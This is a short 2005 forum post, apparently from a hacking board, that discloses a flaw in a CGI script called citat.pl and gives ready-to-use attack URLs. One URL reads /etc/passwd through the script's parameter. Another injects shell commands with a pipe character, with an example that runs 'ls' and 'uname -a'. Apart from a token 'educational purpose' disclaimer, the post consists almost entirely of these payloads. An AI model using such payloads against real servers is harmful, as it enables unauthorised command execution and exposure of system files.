Remote Command Execution In Citat.pl Script

qcred11

Apr 25 2005, 03:27 PM

QUOTE

remote command execution in citat.pl script

IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE

1)file showing
http://www.target.com/cgi-bin/citat.pl?/etc/passwd

2)remote code execution
http://www.target.com/cgi-bin/citat.pl?|command

ex:
http://www.target.com/cgi-bin/citat.pl?|ls;uname -a;

greetz to all magattack members

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.